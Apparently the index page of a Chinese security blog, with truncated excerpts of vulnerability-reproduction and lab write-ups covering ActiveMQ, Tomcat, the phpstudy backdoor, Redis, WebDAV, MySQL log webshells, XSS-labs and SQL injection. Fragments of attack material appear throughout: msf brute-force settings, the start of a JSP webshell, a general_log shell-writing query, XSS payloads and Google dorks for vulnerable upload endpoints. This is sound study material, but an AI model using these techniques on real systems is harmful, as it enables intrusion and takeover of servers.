p_utao的博客

myucms漏洞复现

漏洞演示访问地址f12查看源代码md5解码：md5加密解码40b5daa2352b825d66b8080617408284reach123登录成功poc/exp验证import requestsimport redef start(headers): with open("1.txt", "r") as f: for f1 in f: f2 = f1.strip() try:

漏洞介绍Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。漏洞复现http://10.7.10.41:8161/admin默认账号密码：admin登陆成功

漏洞解析此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时，用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析，导致绕过一些服务器的安全策略。漏洞复现访问地址制作一句话木马上传木马抓包在这里插入图片描述添加个0a...

影响版本全版本漏洞复现msf爆破use auxiliary/scanner/http/tomcat_mgr_login设置IP和端口set rhosts 10.7.10.41set rport 8080（默认端口）run运行tomcat:tomcat登陆成功用大佬的jsp一句话马<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtim

漏洞背景早在2014年，互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在黑客社区，它被命名为“心脏出血”，表明网络上出现了“致命内伤”。利用该漏洞，黑客可以获取约30%的https开头网址的用户登录账号密码，其中包括购物、网银、社交、门户等类型的知名网站。Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就

漏洞原理Jackson-databind 支持 Polymorphic Deserialization 特性（默认情况下不开启），当 json 字符串转换的 Target class 中有 polymorph fields，即字段类型为接口、抽象类或 Object 类型时，攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类)，来实现实例化指定的类，借助某些特殊的 class，如 TemplatesImpl，可以实现任意代码执行。详见：https://blog.youkuaiyun.com/x

先复现下大佬挖到的漏洞任意文件读取漏洞点：protected\modules\admini\controllers\TemplateController.php如下actionUpdateTpl函数调用了file_get_contents对传入的filename文件名的文件内容进行读取，如下filename参数在传入file_get_contents函数之前调用CHtml::encode方法进行了处理。跟进CHtml::encode方法路径：framework\yiilite.php发

靶场信息：地址：https://www.vulnhub.com/entry/dc-1-1,292/难度：简单目标：有五个标志，但是最终目标是在根目录的主目录中找到并读取该标志运行：vm work信息收集nmap直接扫描网段存活主机扫描常见端口nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 ESTNmap scan report for 10.7.10.29Host is u

靶场信息：地址：https://www.vulnhub.com/entry/goldeneye-1,240/难度：简单目标：root目录下flag.txt 文件运行：VirtualBox（网络桥接）信息收集老规矩上来先扫描端口常见端口开放25、80、110端口，访问网站，爆下目录（无果），随便爆破一下25端口的弱口令（无果）中间件：apache然后通过上面得提示访问/sev-home/这个目录，有登陆但是没有密码，这里我打算爆破来着，f12源代码里面有有趣得对话，这里莫非是让

场信息：地址：https://www.vulnhub.com/entry/y0usef-1,624/发布日期：2020年12月10日难度：简单目标：user.txt和root.txt运行：VirtualBox（网络桥接）信息收集Web 服务器： Apache 2.4.10编程语言： PHP 5.5.9操作系统： Ubuntunmap扫描一下nmap 192.168.1.0/24Nmap scan report for 192.168.1.50Host is u

redis介绍Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。从2010年3月15日起，Redis的开发工作由VMware主持。从2013年5月开始，Redis的开发由Pivotal赞助。redis未授权漏洞Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问

漏洞成因IIS server在WEB服务拓展中开启了WebDAV，配置了写入权限，脚本资源访问权限。导致任意文件上传本地搭建首先允许webDAV查看IP命令为ipconfig把IP地址调整为这台机器的IP地址返回访问该IP因为这里主要是为了锻炼写POC，当然也可以直接使用桂林老兵验证直接写shellPOC验证POC验证：import requestsurl = "http://IP"r = requests.options(url)result = r.headers[

sqlmap获取shell常见命令–is-dba：判断是否有dba权限–os-shell：获取系统交互命令–sql-shell：获取数据库交互命令–password：枚举数据库管理系统用户密码哈希值参考：https://www.cnblogs.com/fzblog/p/13800604.html...

关于tp框架ThinkPHP 是一个免费开源的，快速、简单的面向对象的 轻量级PHP开发框架，创立于2006年初，遵循Apache2开源协议发布，是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。并且拥有众多的原创功能和特性，在社区团队的积极参与下，在易用性、扩展性和性能方面不断优化和改进，已经成长为国内最领先和最具影响力的WEB应用开发框架，众多的典型案例确保可以稳定用于商业以及门户级的开发。

前期谷歌语法搜索inurl:/examples/uploadbutton.htmlinurl:/php/upload_json.phpinurl:/asp.net/upload_json.ashxinurl://jsp/upload_json.jspinurl://asp/upload_json.aspinurl:gov.cn/kindeditor/首先一定要看脚本语言，对症下药/asp/upload_json.asp/asp.net/upload_json.ashx/

影响版本phpstudy 2016版php-5.4phpstudy 2018版php-5.2.17phpstudy 2018版php-5.4.45后门分析地址：C:\phpStudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll本地复现phpstudy版本php版本20185.2.17大佬的expGET /index.php HTTP/1.1Host: yourip.comCache-Control: max-

查看general log是否开启show variables like '%general%';打开general_log日志读写功能SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';通过探针查看绝对路径写个shellSET GLOBAL general_log_file='C://phpStudy//PHPTutorial//WWW//shell.php';会把执行的语句写到shell.php，然后我们

前期phpstudy(php + mysql + apache)目的程序员在编写程序时,常常把需要重复使用的一些代码,写在一个单独的文件中,当需要调用这些代码时,再其他文件中包含调用代码文件,这样可以提高编程的效率.包含函数在php中包含调用函数:include()、require()、include_once、require_once()函数作用include函数：如果文件不存在、报错、继续执行1.php<?phpecho '开始';include '2.php';ec

介绍从外网发起的黑盒测试攻击，由于对目标网络一无所知，攻击者首先尽自己所能收集大量的信息，来为后期的攻击做铺垫，信息的收集是非常正常的，它决定了攻击者是否能准确地定位目标网络安全防线的漏洞，当然，信息收集也作用于日常的生活中，“知己知彼，百战不殆”。收集边缘信息收集网络系统公司的结构（天眼查）重要机构分支内部员工账号组成身份识别方式邮件联系地址社交网络账号与信息管理员的网络习惯网络信息收集Google Hackingwhois查询（站长之家）DNS域名查询指纹扫描（云悉、

读写的条件：1.secure_file_priv 的值不能是null2.知道读写的绝对路径3.最好是高权限（root）查看secure_file_priv 的值mysql> show global variables like '%secure%';+------------------+------------------------------+| Variable_name | Value |+----------------

floor函数select count(*),(floor(rand(0)*2))x from table group by x;select查询语句group by进行分组（相同为一组）rand()生成0到1的随机数floor()返回整数count()对数据整合（类似去重）产生原因：mysql在执行该语句会建立一个虚拟表，表中有两个字段（一个是分组的值和一个计数的值），当分组已经存在后就会爆错。参考：http://www.cnblogs.com/sfriend/p/11365999.ht

前期由于玩的是靶场，所以工具都在靶场里，工具如下：菜刀、火绒、火绒插件hackbar复现漏洞任意文件上传打开网站查看/App/Lib/Action/Home/UcAction.class.php，发现任意上传漏洞本步骤分析UcAction.class.php中的public function saveAvatar()函数查看代码漏洞任意文件上传漏洞是因为源代码的不严谨造成的，因此要发现任意文件上传漏洞，需要查看文件源代码，查看UcAction.class.php中的public functi

伪静态是什么伪静态是相对真实静态来讲的，通常我们为了增强搜索引擎的友好面，都将文章内容生成静态页面，但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢，这就产生了伪静态技术。伪静态技术是指展示出来的是以html一类的静态页面形式，但其实是用ASP一类的动态脚本来处理的。伪静态验证既然，我们了解什么是伪静态后，那么我们怎么判断一个网站是静态还是伪静态的呢？首先我们可以根据网站最后的修

前期准备

先来玩Apache解析漏洞，安界网的靶场。漏洞原理Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把test.php.owf.rar解析成php。其余配置问题导致漏洞（1）如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test

搭建xss-labs靶场，这里我直接使用phpstudy来快速搭建。level1第一关，看到传参值是test然后有输出test的地方，所以猜测点这里，直接弹框跳转到第二关。level2果断过了第一关来到了第二关，根据第一关经验，可以看到输入点和输出点，继续尝试在url里输入弹框语句。语句没有执行，那么我们f12审查一下元素。发现两个输出点，一个被实体化了，而另外一个可以闭合绕过来执行语句，构造语句："><script>alert(1)</script>lev

审计cms遇到各种csrf利用前几天想审计一下代码，下载了这个cms但是由于这个cms是试用版，源码有一部分是看不到的，哪位表哥知道怎么看可以告诉我。所以我直接开挖，相比前台的漏洞，后台的更好挖。1. Csrf添加、修改、删除管理员账号打开用户管理现在只有一个admin用户，那么我们点击添加用户直接抓包开始测试直接生成个csrf的poc不会的可以百度！保存为1.html在浏览器中打开，可以看到添加了个管理员修改密码和删除用户也存在csrf漏洞，原理同上。2. Csrf+xss组

@[TOC]二次urldecode注入的原理现在的web程序大多数都会进行参数过滤，通常使用addslashes()、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC的方式来防止注入，如果某处使用了urldecode或者rawurldecode函数，则会导致二次解码生成单引号而引发注入。用下面的代码我们简单的了解一下。<?php$w = addslashes($_GET['id']);$p = urldecode($w);